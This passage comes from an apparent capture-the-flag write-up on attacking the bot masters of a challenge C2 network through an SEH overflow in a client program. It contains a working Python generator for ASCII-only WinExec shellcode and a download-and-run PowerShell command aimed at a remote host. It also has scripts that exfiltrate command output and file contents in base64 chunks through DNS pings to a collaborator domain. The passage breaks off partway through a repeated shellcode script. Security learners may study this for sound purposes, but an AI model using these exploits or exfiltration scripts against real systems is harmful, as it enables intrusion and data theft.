Also, you do not need to worry if the bot masters are taken offline. They will restart and reconnect to the C2 Server automatically!

This clarified things for me. I could contact the bot masters by sending them a message, so perhaps I could send some kind of payload to gain control of them. I set up my own fake C2 server in Python to test this theory.

from http.server import HTTPServer, BaseHTTPRequestHandler
from struct import pack

## from http.server import SimpleHTTPRequestHandler
import datetime

port = 8081

payload = b'A' * 2000

class myHandler(BaseHTTPRequestHandler):
    def do_POST(self):
        self.send_response(200)
        self.send_header('Content-type', 'text/html')
        self.end_headers()

        # Send the html message
        if self.path == '/register.php':
            # self.wfile.write(b'A' * 100000)
            self.wfile.write(
                b'40K8avCKsxKhO6OJ4Am4bq3bqEW6PvfG5hfpPKLeskDqZPHc')
        elif self.path == '/receive.php':
            self.wfile.write(payload)
        return


class StoppableHTTPServer(HTTPServer):
    def run(self):
        try:
            self.serve_forever()
        except KeyboardInterrupt:
            pass
        finally:
            # Clean-up server (close socket, etc.)
            self.server_close()


if __name__ == '__main__':
    server = HTTPServer(('127.0.0.1', 8081), myHandler)
    server.serve_forever()

I started the server and began receiving messages from my local UwU.exe. However, nothing happened. WireShark told me that the messages were received by UwU.exe, but for some reason it did not parse them. By debugging the program and reviewing the “Receive Messages” function in IDA, I discovered that it performed the following check after receiving the message:

    if ( (_DWORD)v82 != 3
      || ((v46 = v6->m128i_i8[0] < 0x55u, v6->m128i_i8[0] != 85)    // Check if first character is U
       || (second_char = v6->m128i_i8[1], v46 = (unsigned __int8)second_char < 0x77u, second_char != 119)   // Check if second character is w
       || (third_char = v6->m128i_i8[2], v46 = (unsigned __int8)third_char < 0x55u, third_char != 85) ? (v49 = v46 ? -1 : 1) : (v49 = 0),   // Check if third character is U
          is_valid_message = 1,
          v49) )
    {
      is_valid_message = 0;
    }
    if ( HIDWORD(v82) >= 0x10 )
    {
      v50 = HIDWORD(v82) + 1;
      if ( (unsigned int)(HIDWORD(v82) + 1) >= 0x1000 )
      {
        v18 = *(_DWORD *)(v81.m128i_i32[0] - 4);
        v50 = HIDWORD(v82) + 36;
        if ( v81.m128i_i32[0] - v18 - 4 > 0x1F )
          goto LABEL_141;
      }
      v66 = (__m128i *)v50;
      sub_5575B048(v18);
    }
    if ( is_valid_message )
    {
      <COPY RESPONSE DATA TO BUFFER>

This meant that the message had to match the format UwU<MESSAGE>. I corrected my server code and tried again. This time, I got a crash:

(3978.edc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** WARNING: Unable to verify timestamp for C:\Users\Eugene\Desktop\tisc\10\UwU_unpacked.exe
eax=41414141 ebx=004854a0 ecx=41414141 edx=41414142 esi=0019fcb4 edi=000001ff
eip=55752d5a esp=0019fc80 ebp=0019fcac iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
UwU_unpacked+0x2d5a:
55752d5a 8b49fc          mov     ecx,dword ptr [ecx-4] ds:002b:4141413d=????????
0:000> !exchain
0019fca0: 41414141
Invalid exception stack at 41414141
0:000> g
(3978.edc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=41414141 edx=773985f0 esi=00000000 edi=00000000
eip=41414141 esp=0019f648 ebp=0019f668 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
41414141 ??              ???

I had triggered an SEH overflow, one of the easiest overflows to exploit. To add to my excitement, I determined that UwU.exe did not include any memory protections like DEP or ASLR thanks to the MPRESS packer. I easily generated a local proof-of-concept to execute Meterpreter shellcode via the overflow in the message. First, I determined that the offset to the overwritten SEH address was 36. Next, I used a simple POP POP RET payload with a JMP 0x08 instruction to get to my shellcode, just like in the basic tutorials. However, it was never going to be that easy. Even though the exploit worked locally, when I sent this to the bot master UwUIDs using the POST /send.php endpoint, nothing happened.

After several more angst-filled hours and confirming with the organisers that the network was working properly, I decided that this was a dead end. The C2 endpoint seemed to be filtering my payloads but I could not find out how it was doing so unless I sent messages to my own instances using the real C2. That required an unencrypted UwUID.

I recalled that the base64-decoded encrypted UwUID had the same number of bytes as the unencrypted plaintext bot master UwUIDs – 36. This suggested that the C2 used a stream cipher because stream ciphers generate the ciphertext by XORing each byte of the plaintext against a keystream, creating a ciphertext of the same length as the plaintext. If the C2 used a block cipher like AES, the plaintext would be padded to the block size length before being encrypted, causing the length of the ciphertext to be greater than the length of the plaintext.

I began researching various ways to break stream ciphers from a black box perspective. Once again, Stack Overflow came to my rescue. One of the answers described a known-plaintext attack against RC4. If the encryption service used the same key each time it encrypted something, the keystream would be the same for all inputs. Since each ciphertext was simply the plaintext XOR keystream, I could retrieve the XOR of two plaintexts by XORing their ciphertexts.

KS = RC4(K)
C1 = KS XOR M1
C2 = KS XOR M2
C1 XOR C2 = (KS XOR M1) XOR (KS XOR M2) = M1 XOR M2

I tried this out by registering twice with the same parameters to get two different ciphertexts. For example, with a=roVwGx&b=gD4ZuM&c=pFvulv&d=XH2CPq&e=I3Yonk, I got oVSFHfzJoQSfTP3PphqGSf7Lug+HTfrSrwHXRv2c9ATWGfma and iVrBK8DOiQrbesHIjhTCf8LMkgHDe8bVhw+TcMGb3AqSL8Wd. Next, I base64-decoded them and XORed them together. This returned the plaintext (.D6<.(.D6<.(.D6<.(.D6<.(.D6<.(.D6<. which was a repeating series of 6 bytes:

28 0e 44 36 3c 07 
28 0e 44 36 3c 07 
28 0e 44 36 3c 07 
28 0e 44 36 3c 07 
28 0e 44 36 3c 07 
28 0e 44 36 3c 07

What did this mean? Since the randomly-generated parameters made up 6 bytes each, I decided to try XORing this output again with each of the parameters. Voila: the mysterious 6 bytes were simply pFvulv (parameter c) XORed with XH2CPq (parameter e). This meant that the C2 cipher randomly selected one of the parameters at registration and repeated it 6 times to create the plaintext.

However, while this explained why the encrypted UwUIDs repeated over time, this looked nothing like a plaintext UwUID. I also retrieved the keystream by XORing the plaintexts with their respective ciphertexts but did not get anything interesting.

Thinking further, I recalled an interesting observation from when I crashed the C2 encrypting function. While I was waiting for the organisers to fix the problem, I tried registering from a remote DigitalOcean Droplet instance and successfully retrieved valid encrypted UwUIDs even though I was unable to do so from my home network. This suggested that the encryption relied on the IP address. I logged into the remote instance and tried generating encrypted UwUIDs with the exact same parameters I had been using. It returned encrypted UwUIDs that were completely different from the ones I had generated from my home network, confirming the IP address hunch. I repeated the same process to retrieve the keystream and compared it to the keystream for my home network.

Keystream 1: d5 10 a7 32 c3 bd d1 46 e9 68 96 bc d0 5c f0 69 93 b9 ca 48 f6 6e 96 a4 84 43 f2 3f 9d e8 d7 12 a6 6e 95 e8
Keystream 2: d1 12 f3 68 90 bf d1 42 e9 39 91 b9 d6 5c f0 3c 92 bd ca 49 f1 38 96 a4 df 47 a1 33 91 ea 84 42 a0 6c 95 ec

I noticed that some bytes matched at the same positions in both keystreams. Most of these were in the same positions as the dash characters in the unencrypted master UwUIDs.

Keystream 1: d5 10 a7 32 c3 bd d1 46 e9 68 96 bc d0 5c f0 69 93 b9 ca 48 f6 6e 96 a4 84 43 f2 3f 9d e8 d7 12 a6 6e 95 e8
Keystream 2: d1 12 f3 68 90 bf d1 42 e9 39 91 b9 d6 5c f0 3c 92 bd ca 49 f1 38 96 a4 df 47 a1 33 91 ea 84 42 a0 6c 95 ec
MasterUwUID: 7  1  5  c  f  1  a  6  -  5  1  d  e  -  4  a  5  5  -  b  e  1  1  -  c  0  f  f  e  e  c  0  f  f  e  e

This strongly signalled that a double-layer known-plaintext attack was at work. The keystream specific to each IP address used to encrypt the random 6-character parameter values was itself a ciphertext generated by XORing the plaintext UwUID belonging to the IP address with a master keystream. Since all plaintext UwUIDs had dash characters in the same positions, their IP address-specific keystreams would also have the same XOR result in those positions.

MASTER_KS = RC4(MASTER_K)
KS1 = MASTER_KS XOR UWUID1
KS2 = MASTER_KS XOR UWUID2
C1 = KS1 XOR RANDOMLY_SELECTED_PARAMETER_VALUE1
C2 = KS2 XOR RANDOMLY_SELECTED_PARAMETER_VALUE2

This explained why when I sent the same parameter values from different IP addresses, their encrypted UwUIDs never matched. But how could I retrieve the master keystream? Other than the dashes, I knew that the plaintext UwUIDs were hexadecimal number characters, i.e. 0-9a-f. With enough individual keystream samples, I could brute force all possible master keystream bytes and select the right one based on whether the candidate byte at position x XORed with all of the keystreams' bytes at position x always returned a byte in the range ASCII 0-9a-f.

Using my favourite VPN ~~ExpressVPNNordVPN~~, I set to work. I generated and retrieved 13 different keystreams from 13 different IP addresses, then used the CyberChef XOR brute force filter to manually check which byte matched. Byte by byte, the keystream emerged. Fortunately, I realised that the master keystream was actually a series of 6 repeating bytes, e7 71 c4 0a a5 89. Next, I XORed the individual keystreams against the master keystream. To my delight, this resulted in legitimate plaintext UwUIds.

With the plaintext UwUID for my IP address, I sent a message using the POST /send.php endpoint, then checked the POST /receive.php endpoint with the encrypted UwUID. The message came through! Now, I could finally figure out why my payloads weren't working. Immediately, I realised that any payload above a certain length resulted in an empty message. I gradually narrowed down the maximum length to 328. Additionally, the first 32 bytes were rewritten to UwUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU. Finally, there were a few bad characters like \x25\x26\x2b. Fortunately, this seemed pretty manageable.

Or so I thought. Not long after, I received a notification from the organisers that they had fixed a bug in the servers. When I retried the receive endpoints, I realised that the number of bad bytes had increased enormously – any byte from \x80 onwards was nulled out. In other words, I had to write ASCII-only shellcode.

While I was fairly comfortable with writing Windows shellcode thanks to the Offensive Security Exploit Developer (OSED) course, I had never faced such severe restrictions before. There were a few writeups on ASCII-only Linux shellcode online but I could not find one for Windows that matched my length requirements.

After the initial panic, I settled on my plan of action. First, I noticed that UwU.exe imported GetProcAddress and GetModuleHandleW, so I could dereference those functions from fixed addresses in the Import Address Table of the executable (remember there were no memory protections like ASLR) and use them to retrieve the address of WinExec from Kernel32. Afterwards, I could call WinExec with my desired commands. To build my shellcode, I heavily modified a Windows shellcode generation script I had previously used for OSED. After doing some research, I also found a useful Linux ASCII shellcode writeup that highlighted several useful gadgets:

## h4W1P - push   0x50315734                # + pop eax -> set eax
## 5xxxx - xor    eax, xxxx                 # use xor to generate string
## j1X41 - eax <- 0                         # clear eax
## 1B2   - xor    DWORD PTR [edx+0x32], eax # assign value to shellcode
## 2J2   - xor    cl, BYTE PTR [edx+0x32]   # nop
## 41    - xor al, 0x31                     # nop
## X     - pop    eax
## P     - push   eax

In particular, I could use xor DWORD PTR [edx+0x32], eax to decode non-ASCII instructions when I could not find a suitable ASCII replacement.

Finally, I found the smallest null-free WinExec shellcode to use as a reference.

With these tools in hand, I began to craft my shellcode. Starting from the top, I replaced my original POP POP RET pointer 0x55758b55 with 0x55756e78 which pointed to pop ebx ; pop ebp ; retn 0x0004 to meet the ASCII character requirements. I also replaced the non-ASCII JMP 0x8 (eb 06) with the ASCII-only JNS 0x8 (79 06). Afterwards, I used the xor DWORD PTR [edx+0x32], eax decoder gadget for my shellcode. My first draft relied heavily on this gadget and did not replace many non-ASCII instructions. I also originally tried to use GetModuleHandleW and GetProcAddress to resolve the address of WinExec. However, for some reason or another, GetProcAddress could not work at all even though GetModuleHandleW worked perfectly. I suspected that this was some strange wide string versus regular string bug but could not fix it even after debugging with GetLastError. It could also have been due to Import Address Filter protections but I could not confirm if that flag was turned on.

Giving up on GetProcAddress, I decided to pass the base address of Kernel32 I had retrieved with GetModuleHandleW to the function search loop used in my reference shellcode. With lots of effort, I eventually got my patchwork payload to work and execute a simple calc. Next, I modified it to powershell iex $(irm http://<IP ADDRESS>) to download and execute a remote PowerShell script. Although this worked on my local instances, it failed when I tried it on the master UwUIDs – an incresingly common pattern. As I was working without any visibility of the bot masters, I faced huge difficulties trying to figure out why it was failing. After hours of frustration, I decided to focus on cleaning up my shellcode – perhaps the messy shellcode caused problems.

Firstly, my over-reliance on the decoding gadget created lots of unnecessary instructions, reducing the number of bytes available for my WinExec command. I bit the bullet and tried to convert some of the encoded bytes to true ASCII shellcode. I discovered a few useful gadgets to replace these instructions with their ASCII equivalents.

Non-ASCII Bytes	Non-ASCII Instructions	ASCII Bytes	ASCII Instructions
01 fe	add esi,edi;	57 03 34 24	push edi; add esi, DWORD PTR [esp];
8b 74 1f 1c	mov esi, DWORD PTR [edi+ebx*1+0x1c];	5e 33 74 1f 1c	pop esi; xor esi, DWORD PTR [edi+ebx*1+0x1c];
31 db	xor ebx, ebx;	53 33 1c 24	push ebx; xor ebx, DWORD PTR [esp];

The only non-ASCII instructions I could not replace were the CALL and negative short JMP instructions, so I continued to rely on the decoder gadget for those. Thanks to these optimisations, I cut down on two-thirds of the decoder gadgets and freed up 40 bytes – a fortune in shellcode. I now had 76 bytes for my command argument. I also patched a bug where Windows 7 needed a valid uCmdShow argument for WinExec – Windows 8 and 10 gracefully dealt with any invalid uCmdShow arguments. My new and improved shellcode worked much more reliably.

##!/usr/bin/python3
import argparse
import keystone as ks
from struct import pack

def to_hex(s):
    retval = list()
    for char in s:
        retval.append(hex(ord(char)).replace("0x", ""))
    return "".join(retval)


def push_string(input_string):
    rev_hex_payload = str(to_hex(input_string))
    rev_hex_payload_len = len(rev_hex_payload)

    instructions = []
    first_instructions = []
    null_terminated = False
    for i in range(rev_hex_payload_len, 0, -1):
        # add every 4 byte (8 chars) to one push statement
        if ((i != 0) and ((i % 8) == 0)):
            target_bytes = rev_hex_payload[i-8:i]
            instructions.append(f"push dword 0x{target_bytes[6:8] + target_bytes[4:6] + target_bytes[2:4] + target_bytes[0:2]};")
        # handle the left ofer instructions
        elif ((0 == i-1) and ((i % 8) != 0) and (rev_hex_payload_len % 8) != 0):
            if (rev_hex_payload_len % 8 == 2):
                first_instructions.append(f"mov al, 0x{rev_hex_payload[(rev_hex_payload_len - (rev_hex_payload_len%8)):]};")
                first_instructions.append("push eax;")
            elif (rev_hex_payload_len % 8 == 4):
                target_bytes = rev_hex_payload[(rev_hex_payload_len - (rev_hex_payload_len%8)):]
                first_instructions.append(f"mov ax, 0x{target_bytes[2:4] + target_bytes[0:2]};")
                first_instructions.append("push eax;")
            else:
                target_bytes = rev_hex_payload[(rev_hex_payload_len - (rev_hex_payload_len%8)):]
                first_instructions.append(f"mov al, 0x{target_bytes[4:6]};")
                first_instructions.append("push eax;")
                first_instructions.append(f"mov ax, 0x{target_bytes[2:4] + target_bytes[0:2]};")
                first_instructions.append("push ax;")
            null_terminated = True
            
    instructions = first_instructions + instructions
    asm_instructions = "".join(instructions)
    return asm_instructions


def ascii_shellcode(breakpoint=0):
    command = "calc"
    if len(command) > 76:
        exit(1)
    command += " " * (76 - len(command)) # amount of padding available
    asm = [
        # at start, eax, esi, edi are nulled
        "   start:                               ",
        f"{['', 'int3;'][breakpoint]}            ",
        "       pop     edx ;",
        "       pop     edx ;",                                     # Pointer to shellcode in edx
        "       xor     al, 0x7f;",                                 # inc eax to 0x80 which xors out the ones that are out of reach
        "       inc     eax;",
        "       xor     dword ptr [edx+0x6e], eax;",                # correct ff d7 call   edi
        "       xor     dword ptr [edx+0x6f], eax;",                # correct ff d7 call   edi
        "       push    0x7f;",                                     # dont need ebx, use eax
        "       pop     ebx;",
        "       xor     dword ptr [edx+ebx+0x24], eax;",            # correct ad lods   eax,dword ptr ds:[esi]
        "       xor     dword ptr [edx+ebx+0x29], eax;",            # correct 75 ed jne    0x68
        "       push    0x7f;",
        "       add     ebx, dword ptr [esp];",
        "       xor     dword ptr [edx+ebx+0x27], eax;",            # correct ff d7 call   edi    msiexec
        "       xor     dword ptr [edx+ebx+0x28], eax;",            # correct ff d7 call   edi
        "       xor     dword ptr [edx+ebx+0x7f], eax;",            # correct ff d7 call   edi
        "       xor     dword ptr [edx+ebx+0x7f], eax;",            # correct ff d7 call   edi
        "       push    0x53736046;",                               # 60 should xor with 80 to get e0
        "       pop     ebx;",                                      # IAT address pointer to GetModuleHandle in ebx
        "       push    0x01014001;",
        "       add     ebx, dword ptr [esp];",
        "       add     ebx, dword ptr [esp];",
        "       push    0x01010101;",                               # use eax to xor for null bytes in wide string and invalid chars in GetModuleHandle address pointer
        "       pop     eax;",                                      # use eax to xor for null bytes in wide string
        "       xor     edi, dword ptr [ebx];",                     # dereference IAT, get GetModuleHandle in edi       
        "       push    esi;",                                      # nulls for end of wide string
        "       push    0x01330132;",                               # push widestring "kernel32" onto stack
        "       xor     dword ptr [esp], eax;",
        "       push    0x016d0164;",                   
        "       xor     dword ptr [esp], eax;",
        "       push    0x016f0173;",                   
        "       xor     dword ptr [esp], eax;",
        "       push    0x0164016a;",                   
        "       xor     dword ptr [esp], eax;",
        "       push    esp;",
        "       call    edi;",                                      # call GetModuleHandle(&"kernel32")
        "       push    eax;",                                      # Kernel32 base address in eax
        "       pop     edi;",
        "       push    esi;",                                      # null bytes
        "       pop     ebx;",                                  
        "       xor     ebx, dword ptr [edi + 0x3C];",              # ebx = [kernel32 + 0x3C] = offset(PE header)
        "       push    ebx;",                                      # null out bytes on top of stack
        "       xor     ebx, dword ptr [esp];",
        "       pop     eax;",
        "       xor     ebx, dword ptr [edi + eax + 0x78];",        # ebx = [PE32 optional header + offset(PE32 export table offset)] = offset(export table)
        "       xor     esi, dword ptr [edi + ebx + 0x20];",        # esi = [kernel32 + offset(export table) + 0x20] = offset(names table)
        "       push    edi;",
        "       add     esi, dword ptr [esp];",                     # esi = kernel32 + offset(names table) = &(names table)
        "       xor     dword ptr [esp], edi;",                     # null out bytes on top of stack
        "       pop     edx;",
        "       xor     edx, [edi + ebx + 0x24];",                  # edx = [kernel32 + offset(export table) + 0x24] = offset(ordinals table)
        push_string("WinE"),
        "       pop     ecx;",                                      # ecx = 'WinE'
        "   find_winexec_x86:"
        "       push    ebp;",
        "       xor     dword ptr [esp], ebp;",                     # null out bytes on top of stack
        "       AND     ebp, dword ptr [esp];",                     # nulls out ebp for xor operation
        "       xor     BP, WORD ptr [edi + edx];",                 # ebp = [kernel32 + offset(ordinals table) + offset] = function ordinal
        "       INC     edx;",
        "       INC     edx;",                                      # edx = offset += 2
        "       lodsd;",                                            # eax = &(names table[function number]) = offset(function name)
        "       CMP     [edi + eax], ecx; "                         # *(DWORD*)(function name) == "WinE" ?
        "       JNE     find_winexec_x86;",
        "       pop     esi;",
        "       xor     esi, dword ptr [edi + ebx + 0x1C];",        # esi = [kernel32 + offset(export table) + 0x1C] = offset(address table)] = offset(address table)
        "       push    edi;",
        "       add     esi, dword ptr [esp];",                     # esi = kernel32 + offset(address table) = &(address table)
        "       push    ebp;",
        "       add     ebp, dword ptr [esp];",
        "       add     edi, [esi + ebp * 2];",                     # edi = kernel32 + [&(address table)[WinExec ordinal]] = offset(WinExec) = &(WinExec)
        "       push    0x31;",                                     # null out eax
        "       pop     eax;",
        "       xor     al, 0x31;",
        "       push    eax;",
        push_string(command),                                       # set up args for WinExec
        "       push    esp;",
        "       pop     ebx;",
        "       inc     eax;",
        "       push    eax;",
        "       push    ebx;",
        "       inc     ecx;",                                      # NOP
        "       inc     ecx;",                                      # NOP
        "       CALL    edi;",                                      # WinExec(&("calc"), 1);
        # If you like graceful exits
        # "       push   0x53736016;",                            
        # "       pop    ebx;",                                       
        # "       push 0x01014001;",
        # "       add ebx, dword ptr [esp];",
        # "       add ebx, dword ptr [esp];",                         # ebx = IAT address pointer to TerminateProcess
        # "       push eax;",                                     
        # "       xor     eax, dword ptr [esp];",                     # uExitCode = 0
        # "       push    eax;",
        # "       and     edi, dword ptr [esp];",                     # null out edi
        # "       xor    edi, dword ptr [ebx];",                      # edi = *TerminateProcess
        # "       dec eax;",                                          # hProcess = 0xFFFFFFFF
        # "       push eax;",
        # "       inc ecx;",                                          # NOP
        # "       call edi;",                                         # TerminateProcess(0xFFFFFFFF, 0)
    ]
    return "\n".join(asm)


def main(args):
    shellcode = ascii_shellcode( args.debug_break)

    eng = ks.Ks(ks.KS_ARCH_X86, ks.KS_MODE_32)
    encoding, _ = eng.asm(shellcode)

    url_encoded_payload = ""
    payload = b'UwU'                                        # magic bytes
    payload += b'A' * 29                                    # offset
    payload += pack("<L", (0x41410679))                     # jns    0x8
    payload += pack("<L", (0x55756e78))                     # pop ebx ; pop ebp ; retn 0x0004
    payload += bytes(encoding)                              # shellcode
    payload += b"A" * (328 - len(payload))                  # filler
    for enc in payload:
        url_encoded_payload += "%{0:02x}".format(enc)

    print("url_encoded_payload = " + url_encoded_payload
        .replace("%ff%d7", "%7f%57")
        .replace("%8b","%0b")
        .replace("%fe","%7e")
        .replace("%b7","%37")
        .replace("%ad","%2d")
        .replace("%ee","%6e")
        .replace("%ae","%2e")
        .replace("%ed", "%6d"))


if __name__ == "__main__":
    parser = argparse.ArgumentParser(
        description="Creates shellcodes compatible with the OSED lab VM"
    )

    parser.add_argument(
        "-d",
        "--debug-break",
        help="add a software breakpoint as the first shellcode instruction",
        action="store_true",
    )

    args = parser.parse_args()

    main(args)

This time, I had enough bytes to run a ping <BURP COLLABORATOR DOMAIN> command on the bot masters. Thankfully, I got a pingback!

DNS Ping

I excitedly began trying other payloads like the remote PowerShell script execution, msiexec, and more. However, despite my many attempts, none of these reached my server other than the DNS requests. With a growing sense of dread, I came to terms with what this meant: the challenge expected me to use DNS exfiltration. I confirmed this by sending a series of commands like powershell Add-Content test spaceraccoon, powershell Add-Content test .<BUR PCOLLABORATOR URL>, and powershell "ping $(type test)", which resulted in a DNS pingback at spaceraccoon.<BURP COLLABORATOR DOMAIN>.

DNS Write File

While there was good news – I could write to arbitrary files – this further confirmed that DNS exfiltration was the way to go. I began writing a script to automate this exfiltration. To retrieve the outputs of commands, I wrote the output of the command to a working file, then appended my burpcollaborator domain. Next, I replaced any non-DNS-compatible characters using PowerShell. Finally, I pinged the concatenated domain in the file and hopefully retrieved the output.

For example, to retrieve the current working directory, I ran:

def exfil_working_file():
    send_command("powershell Add-Content {} .{}. -NoNewLine".format(WORKING_FILE, COLLABORATOR_INSTANCE))
    send_command("powershell Add-Content {} burpcollaborator.net -NoNewLine".format(WORKING_FILE))
    send_command("powershell ping $(type {})".format(WORKING_FILE))
    delete_file(WORKING_FILE)

def get_pwd():
    send_command("cmd /c \"cd > {}\"".format(WORKING_FILE))
    send_command("powershell \"(Get-Content {}).replace(':', '-') | Set-Content {} -NoNewLine\"".format(WORKING_FILE, WORKING_FILE))
    send_command("powershell \"(Get-Content {}).replace('\\', '-') | Set-Content {} -NoNewLine\"".format(WORKING_FILE, WORKING_FILE))
    send_command("powershell \"(Get-Content {}).replace(' ', '.') | Set-Content {} -NoNewLine\"".format(WORKING_FILE, WORKING_FILE))
    exfil_working_file()

I got a pingback at C--Users-Administrator-AppData-LocalLow.<BURP COLLABORATOR DOMAIN>, which I converted back to C:\Users\Administrator\AppData\LocalLow.

Since the master bots included the special UwU.exe instances with the flag, I aimed to locate and exfiltrate it. I began enumerating the files in the current working directory with:

def get_file_name(index):
    send_command("powershell \"Add-Content {} $(ls)[{}].Name -NoNewLine\"".format(WORKING_FILE, index))
    send_command("powershell \"(Get-Content {}).replace('_', '-') | Set-Content {} -NoNewLine\"".format(WORKING_FILE, WORKING_FILE))
    exfil_working_file()

This leaked the file names Microsoft, Temp, and 1_run_uwu1.bat. This seemed interesting. To exfiltrate files, I first converted them to base64 using certutil and a special undocumented option. I then replaced the incompatible base64 characters like + and / with - and . respectively. Unfortunately, I could not use + directly since \x26 was a bad character, so I replaced it with the functionally-equivalent [char]43. I also removed any trailing = characters. Next, I exfiltrated the file in blocks of 50 base64 characters at a time. To ensure that I got the blocks in the correct order, I added the block number before and after the base64 characters as a primitive checksum.

def delete_file(filename):
    send_command('powershell del {}'.format(filename))
    
def get_file_length(filename):
    send_command("powershell \"Add-Content {} $(Get-Content {}).length -NoNewLine\"".format(WORKING_FILE, filename))
    exfil_working_file()

def exfil_file(filename):
    base64_file = "e"
    block_size = 50

    # delete base64 file
    delete_file(base64_file)

    # create base64 file
    send_command("certutil -encodehex -f {} {} 0x40000001".format(filename, base64_file))

    # get base64 file length
    get_file_length(base64_file)
    file_length = int(input("[*] Enter received base64 file length: "))

    # replace non-DNS compliant chars
    send_command("powershell \"(Get-Content {}).replace([char]43, '-') | Set-Content {}\"".format(base64_file, base64_file))
    send_command("powershell \"(Get-Content {}).replace('/', '.') | Set-Content {}\"".format(base64_file, base64_file))
    send_command("powershell \"(Get-Content {}).replace('=', '') | Set-Content {}\"".format(base64_file, base64_file))


    offset = 0
    while offset < file_length:
        print("[+] Exfiltrating offset {} in file {}".format(offset, filename))
        # Add offset at front and back to prevent .. error and also to ensure that all blocks are received
        send_command("powershell \"Add-Content {} {} -NoNewLine\"".format(WORKING_FILE, offset))
        if (offset + block_size) > file_length:
            send_command("powershell \"Add-Content {} $(Get-Content {}).substring({},{}) -NoNewLine\"".format(WORKING_FILE, base64_file, offset, file_length - offset - 1))
        else:
            send_command("powershell \"Add-Content {} $(Get-Content {}).substring({},{}) -NoNewLine\"".format(WORKING_FILE, base64_file, offset, block_size))
        send_command("powershell \"Add-Content {} {} -NoNewLine\"".format(WORKING_FILE, offset))
        offset += block_size

        exfil_working_file()

After a long wait, I got the contents of 1_run_uwu1.bat.

@echo off
echo ^1>uwu_cmds.txt
echo %c2ip%>>uwu_cmds.txt
echo %c2port%>>uwu_cmds.txt
echo ^3>>uwu_cmds.txt

:loop
type uwu_cmds.txt | C:\Users\Administrator\AppData\LocalLow\cmd.exe /c final_uwu_with_flag.exe
taskkill /im werfault.exe /f
goto loop

Great! I could try exfiltrating final_uwu_with_flag.exe, but my get_file_length function told me that the base64 encoding of final_uwu_with_flag.exe was 989868 bytes long, which would have taken days to exfiltrate. Instead, the contents of 1_run_uwu1.bat gave me an idea – why not pipe inputs to final_uwu_with_flag.exe to execute the “Display Killswitch” option, write the output to a file, then exfiltrate that instead? I could save even more bytes by grepping the output for the TISC{ flag marker.

def exfil_final_uwu():
    delete_file("c")
    delete_file("x")
    delete_file("y")
    send_command("cmd /c \"echo ^4 > c\"")
    send_command("cmd /c \"echo ^5 >> c\"")
    send_command("cmd /c \"type c | cmd /c final_uwu_with_flag.exe > x\"")
    sleep(3)        # more time to play UwU sound
    send_command("powershell \"Select-String -Path x -Encoding ascii -Pattern TISC|Out-File y\"")       # save more time
    exfil_file("y")

Without further ado, I started the exfiltration. As each minute ticked by, the base64 strings slowly emerged.

Exfil Flag

Halfway through, I placed the half-finished base64 string into a decoder, and there it was. I had finally reached the end of this insane odyssey. Thankfully, there was no bonus level, so I submitted my flag and got some sleep.

##!/usr/bin/python3
import requests
import keystone as ks
from struct import pack
from time import sleep
## import uuid

def to_hex(s):
    retval = list()
    for char in s:
        retval.append(hex(ord(char)).replace("0x", ""))
    return "".join(retval)


def push_string(input_string):
    rev_hex_payload = str(to_hex(input_string))
    rev_hex_payload_len = len(rev_hex_payload)

    instructions = []
    first_instructions = []
    null_terminated = False
    for i in range(rev_hex_payload_len, 0, -1):
        # add every 4 byte (8 chars) to one push statement
        if ((i != 0) and ((i % 8) == 0)):
            target_bytes = rev_hex_payload[i-8:i]
            instructions.append(f"push dword 0x{target_bytes[6:8] + target_bytes[4:6] + target_bytes[2:4] + target_bytes[0:2]};")
        # handle the left ofer instructions
        elif ((0 == i-1) and ((i % 8) != 0) and (rev_hex_payload_len % 8) != 0):
            if (rev_hex_payload_len % 8 == 2):
                first_instructions.append(f"mov al, 0x{rev_hex_payload[(rev_hex_payload_len - (rev_hex_payload_len%8)):]};")
                first_instructions.append("push eax;")
            elif (rev_hex_payload_len % 8 == 4):
                target_bytes = rev_hex_payload[(rev_hex_payload_len - (rev_hex_payload_len%8)):]
                first_instructions.append(f"mov ax, 0x{target_bytes[2:4] + target_bytes[0:2]};")
                first_instructions.append("push eax;")
            else:
                target_bytes = rev_hex_payload[(rev_hex_payload_len - (rev_hex_payload_len%8)):]
                first_instructions.append(f"mov al, 0x{target_bytes[4:6]};")
                first_instructions.append("push eax;")
                first_instructions.append(f"mov ax, 0x{target_bytes[2:4] + target_bytes[0:2]};")
                first_instructions.append("push ax;")
            null_terminated = True
            
    instructions = first_instructions + instructions
    asm_instructions = "".join(instructions)
    return asm_instructions


def ascii_shellcode(command):
    if len(command) > 76:
        print("[-] Command is too long!")
        exit(1)
    padded_command = command + " " * (76 - len(command)) # amount of padding available
    asm = [
        # at start, eax, esi, edi are nulled
        "   start:",
        "       pop     edx;",
        "       pop     edx;",                                  # Pointer to shellcode in edx
        "       xor     al, 0x7f;",                             # inc eax to 0x80 which xors out the ones that are out of reach
        "       inc     eax;",
        "       xor     dword ptr [edx+0x6e], eax;",            # correct ff d7 call   edi
        "       xor     dword ptr [edx+0x6f], eax;",            # correct ff d7 call   edi
        "       push    0x7f;",                                 # dont need ebx, use eax
        "       pop     ebx;",
        "       xor     dword ptr [edx+ebx+0x24], eax;",        # correct ad lods eax,dword ptr ds:[esi]
        "       xor     dword ptr [edx+ebx+0x29], eax;",        # correct 75 ed jne    0x68
        "       push    0x7f;",
        "       add     ebx, dword ptr [esp];",
        "       xor     dword ptr [edx+ebx+0x27], eax;",        # correct ff d7 call   edi 
        "       xor     dword ptr [edx+ebx+0x28], eax;",        # correct ff d7 call   edi
        "       xor     dword ptr [edx+ebx+0x7f], eax;",        # correct ff d7 call   edi
        "       xor     dword ptr [edx+ebx+0x7f], eax;",        # correct ff d7 call   edi
        "       push    0x53736046;",                           # 60 should xor with 80 to get e0
        "       pop     ebx;",                                  # IAT address pointer to GetModuleHandle in ebx
        "       push 0x01014001;",
        "       add ebx, dword ptr [esp];",
        "       add ebx, dword ptr [esp];",
        "       push    0x01010101;",                           # use eax to xor for null bytes in wide string and invalid chars in GetModuleHandle address pointer
        "       pop     eax;",                                  # use eax to xor for null bytes in wide string
